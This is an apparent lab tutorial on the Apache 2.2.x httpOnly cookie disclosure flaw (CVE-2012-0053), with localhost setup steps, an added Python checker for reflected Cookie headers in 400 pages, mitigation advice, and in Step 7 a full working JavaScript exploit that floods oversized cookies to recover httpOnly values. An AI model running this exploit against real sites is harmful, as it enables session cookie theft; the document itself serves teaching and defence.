Exploit: Apache httpOnly Cookie

Apache HTTP Server is prone to an information-disclosure vulnerability. The issue occurs in the default error response for status code 400.
Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.
The vulnerability affects Apache HTTP Server versions 2.2.0 through 2.2.21.
(source: http://www.securityfocus.com/bid/51706/discuss)



We will demonstrate how to exploit the Apache httpOnly cookie disclosure.
Step 1
Create a Perl CGI script named setcookie as follows and put it in the cgi-bin folder (Ubuntu: /usr/lib/cgi-bin):
#!/usr/bin/perl
use strict;
use warnings;
use CGI;
use CGI::Cookie;

# Build a test cookie; -httponly => 0 leaves it readable from JavaScript
my $cgi    = CGI->new;
my $cookie = CGI::Cookie->new(
    -name     => 'CVE20120053',
    -value    => 'testcookie',
    -expires  => '+3M',
    -domain   => 'localhost',
    -path     => '/',
    -secure   => 0,
    -httponly => 0,
);
# Send the Set-Cookie header; the response body is intentionally empty
print $cgi->header(-cookie => $cookie);

Step 2
Create an HTML file named readcookie.html that reads the cookie from JavaScript, like this:
<html>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>

Step 3
Open your browser and type url: http://localhost/cgi-bin/setcookie

The cookie has been set successfully.

Step 4
Open your browser again and type url: http://localhost/httponly/readcookie.html

JavaScript can read the cookie successfully.

Step 5
Edit the setcookie file in the cgi-bin folder and enable the httponly flag, changing
 -httponly => 0
to
 -httponly => 1

Step 6
Open your browser again and type url: http://localhost/httponly/readcookie.html

JavaScript can no longer read the cookie because the httpOnly flag is enabled.
Apache HTTP Server versions 2.2.0 through 2.2.21, however, have a vulnerability in the default 400 error response that lets us bypass httpOnly.
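The two checks a defender wants at this point are whether a cookie is issued with the HttpOnly flag at all, and whether the server's 400 error page reflects the request's Cookie header back to the client (which is what makes the flag bypassable). The following Python is an added example and is not part of the original post or of Apache; the Set-Cookie values and the two 400 response bodies are constructed samples modelled on the Apache error text, and all function names are the example's own.

```python
"""
Added example (not from the original post): defender-side checks for the
two conditions this post demonstrates.

1. audit_set_cookie(): does a Set-Cookie header carry HttpOnly (and Secure)?
2. response_reflects_cookie(): does a captured 400 response body echo the
   request's Cookie header inside <pre>...</pre>? If it does, a script can
   recover HttpOnly cookies by provoking a 400 and reading the body.
3. leaked_cookie_names(): which cookie names such a body exposes.

All sample header values and response bodies below are constructed.
"""
import re


def audit_set_cookie(header_value):
    """Return the cookie name and whether HttpOnly / Secure are present."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0]
    # Attribute names are case-insensitive; values (Path=/ etc.) are dropped
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    return {
        "name": name,
        "httponly": "httponly" in attrs,
        "secure": "secure" in attrs,
    }


PRE_RE = re.compile(r"<pre>(.*?)</pre>", re.IGNORECASE | re.DOTALL)


def response_reflects_cookie(status, body):
    """True if a 400 response body reproduces a Cookie: header verbatim.

    This is the same condition the exploit in the post relies on: the
    offending request header appears inside <pre> tags of the error page.
    """
    if status != 400:
        return False
    m = PRE_RE.search(body)
    if not m:
        return False
    return re.search(r"^\s*Cookie:\s", m.group(1),
                     re.IGNORECASE | re.MULTILINE) is not None


def leaked_cookie_names(body):
    """Names of the cookies visible in a reflected Cookie header."""
    m = PRE_RE.search(body)
    if not m:
        return []
    echoed = m.group(1)
    if "Cookie:" not in echoed:
        return []
    raw = echoed.split("Cookie:", 1)[1]
    names = []
    for item in raw.split(";"):
        item = item.strip()
        if not item or "=" not in item:
            continue
        names.append(item.split("=", 1)[0])
    return names


# Constructed samples (not captured from a real server)
GOOD_COOKIE = "session=abc123; Path=/; HttpOnly; Secure"
WEAK_COOKIE = "CVE20120053=testcookie; Path=/; Domain=localhost"

# Approximation of the vulnerable default error page: the header is echoed
VULNERABLE_400 = (
    "<html><head><title>400 Bad Request</title></head><body>"
    "<h1>Bad Request</h1><p>Your browser sent a request that this server "
    "could not understand.<br />\nSize of a request header field exceeds "
    "server limit.<br />\n<pre>\nCookie: xss0=xxxx; CVE20120053=testcookie; "
    "session=abc123\n</pre>\n</p></body></html>"
)
# A 400 page that does not echo any request header
SAFE_400 = (
    "<html><head><title>400 Bad Request</title></head><body>"
    "<h1>Bad Request</h1><p>Your browser sent a request that this server "
    "could not understand.</p></body></html>"
)

if __name__ == "__main__":
    print(audit_set_cookie(WEAK_COOKIE))
    print(response_reflects_cookie(400, VULNERABLE_400),
          leaked_cookie_names(VULNERABLE_400))
    print(response_reflects_cookie(400, SAFE_400),
          leaked_cookie_names(SAFE_400))
```

Run the checks against a 400 body captured from your own server (for example with the browser's network panel): a reflected Cookie: line means HttpOnly is not protecting anything on that host. Besides upgrading Apache, the usual workaround was to serve a static custom 400 page via Apache's ErrorDocument directive so that the malformed request header is never echoed.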

Step 7
Create readcookie2.html containing the injection script from http://www.exploit-db.com/exploits/18442/ (placed inside a <script> element, as in Step 2), as follows:
// Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
// Most browsers limit cookies to 4k characters, so we need multiple
function setCookies (good) {
    // Construct string for cookie value
    var str = "";
    for (var i=0; i< 819; i++) {
        str += "x";
    }
    // Set cookies
    for (i = 0; i < 10; i++) {
        // Expire evil cookie
        if (good) {
            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss"+i+"="+str+";path=/";
        }
        document.cookie = cookie;
    }
}
 
function makeRequest() {
    setCookies();
 
    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content
            var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
            if (content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object
                for (var i=0; i<cookies.length; i++) {
                    var s_c = cookies[i].split('=',2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset malicious cookies
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }
    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}
 
makeRequest();

Step 8
Open your browser again and type url: http://localhost/httponly/readcookie2.html
Bingo! We can read the cookie even though httpOnly is enabled.